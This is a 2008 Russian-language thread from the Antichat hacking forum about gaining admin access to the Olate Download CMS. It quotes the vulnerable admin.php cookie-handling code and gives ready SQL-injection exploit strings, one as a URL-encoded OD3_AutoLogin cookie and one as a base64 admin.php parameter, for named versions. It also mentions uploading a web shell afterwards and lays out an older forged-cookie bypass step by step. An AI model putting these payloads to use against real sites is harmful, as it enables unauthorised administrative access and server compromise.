Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Olate Download (sql injection) (https://forum.antichat.xyz/showthread.php?t=70847)

(Dm) 19.05.2008 22:50
Olate Download (sql injection)
 
Оф сайт: http://www.olate.co.uk/od3

SQL-injection в admin.php

PHP код:
if (isset($input['OD3_AutoLogin']))
{    
    $parts explode('::'plain_decrypt($input['OD3_AutoLogin']));
    $hash $parts[0];
    $data $parts[1];
    
    $data unserialize(stripslashes($data));
    //print_r($data);
    //exit;
    // Give them nice names
    $user_id $data[0];
    $username $data[1];
    $group_id $data[2];
    
    // Check the user exists
    $result $dbim->query('SELECT id 
                            FROM '.DB_PREFIX.'users 
                            WHERE (id = "'.$user_id.'") 
                                AND (username = "'.$username.'")
                                    AND (group_id="'.$group_id.'")');
    
    if ((md5($user_id.$username.$group_id) == $hash) && $dbim->num_rows($result) == 1)
    {
        $uam->user_login($user_id$username$group_id);
    } 
В следствии чего имеем: получение прав администратора:

Цитата:
Exploit for <Olate Download 3.4.0 - 1>

Cookie: OD3_AutoLogin
de355f588b05f229aa1162cc9a3d16b5%3A%3Aa%3A3%3A%7Bi %3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A15%3A%22xek%2 2%29+or+id%3D1+%23%22%3Bi%3A2%3Bs%3A1%3A%222%22%3B %7D

Цитата:
Exploit for <Olate Download 3.4.2 - 3>

admin.php?OD3_AutoLogin=WkdVek5UVm1OVGc0WWpBMVpqSX lPV0ZoTVRFMk1tTmpPV0V6WkRFMllqVTZPbUU2TXpwN2FUb3dP M002TVRvaU1TSTdhVG94TzNNNk1UVTZJbmhsYTF3aUtTQnZjaU JwWkQweElDTWlPMms2TWp0ek9qRTZJaklpTzMwPQ==
Имея права администратора, можно загрузить на сервер веб шелл.

для тех кто в танке:
_http://www.securityfocus.com/bid/25343/info
_http://myimei.com/security/2007-08-16/olate-download-341adminphpauthentication-bypassing.html

Не имеют никакого отношения к этой уязвимости

Jokester 21.05.2008 16:04
Цитата:
Сообщение от (Dm)
для тех кто в танке:
_http://www.securityfocus.com/bid/25343/info
_http://myimei.com/security/2007-08-16/olate-download-341adminphpauthentication-bypassing.html
Не имеют никакого отношения к этой уязвимости
Я наверное и правда в танке, тогда помогите мне вылезти :D
Мне неясно зачем вызывать ошибку в базе, если авторизация идёт по логину,user_id и group_id которые извесны?
Вот сплоит с securityfocus:
17225df9b911486c1ccae0378094c33a::a:3:{i:0;i:2;i:1 ;s:4:\"imei\";i:2;i:2;}(У них тут ошибка имхо т.к user_id админа =1,(хеш сгенерирован именно 1imei2) ,но суть не в этом),
далее:
imei меняем на реальный логин,хешируем строку 1ЛОГИН2 где:

1-user_id,
ЛОГИН-реальный логин админа
2-group_id

скармливаем её скрипту в куках и мы в админке.
Эту ошибку уже нашли год назад

вот что предлагает ТС:
de355f588b05f229aa1162cc9a3d16b5::a:3:{i:0;s:1:"1" ;i:1;s:15:"xek\") or id=1 #";i:2;s:1:"2";}

Может я неверно понял работу сплоита или скрипта?Обьясните пожалуйста зачем базе передавать х.з что?
А то я так и останусь в танке :D

(Dm) 09.06.2008 13:14
то что нашли год назад, это работает на новых версиях??? ты проверял, ее работоспособность??? приведи пример конкретного сайта где это работает... мне сейчас впадлу снова копать код и проверять то что ты написал.
Если не работает, то ты даже не танкист а ЛОШАРА, а если работает МОЛОДЕЦ.

Jokester 09.06.2008 13:39
Цитата:
Сообщение от (Dm)
то что нашли год назад, это работает на новых версиях??? ты проверял, ее работоспособность??? приведи пример конкретного сайта где это работает... мне сейчас впадлу снова копать код и проверять то что ты написал.
Если не работает, то ты даже не танкист а ЛОШАРА, а если работает МОЛОДЕЦ.
Прежде чем запостить что-то, я думаю,следовательно:
Причём сдесь год назад? Ты пишешь о версии 3.4.2 - 3 , я смотрел версию 3.4.3 это помоему как раз последняя.Я не проверял на сайтах, а СМОТРЕЛ КОД.Он не отличается от твоего примера, т.е. его не меняли, и соответственно всё работает.
Далее:, что год назад, что сейчас, зачем в запрос к базе вставлять скуль, если можно зайти по сформированным кукам?
И ещё момент, если ты публикуешь что-то, что значит:
Цитата:
Сообщение от (Dm)
мне сейчас впадлу снова копать код
Ты такой мега крутой , что твои слова не требуют подтверждения?Мне вот не впадлу было посмотреть код, прежде чем возразить тебе
И если уж на то пошло, твой пример будет работать до тех пор пока не изменят условие проверки , но до этих самых пор будет работать и найденая год назад бага

(Dm) 11.06.2008 00:20
да согласен. но мой вариант, более эффективен) ничего не нужно искать, хешировать и т.д. логин админа может быть любым.
Подставил в запрос получил админа... ))) этож гуд)
PS хотя securityfocus.com пишут что Not Vulnerable: Olate Download 3.4.2 ... на заборе видимо тоже пишут.


Время: 19:05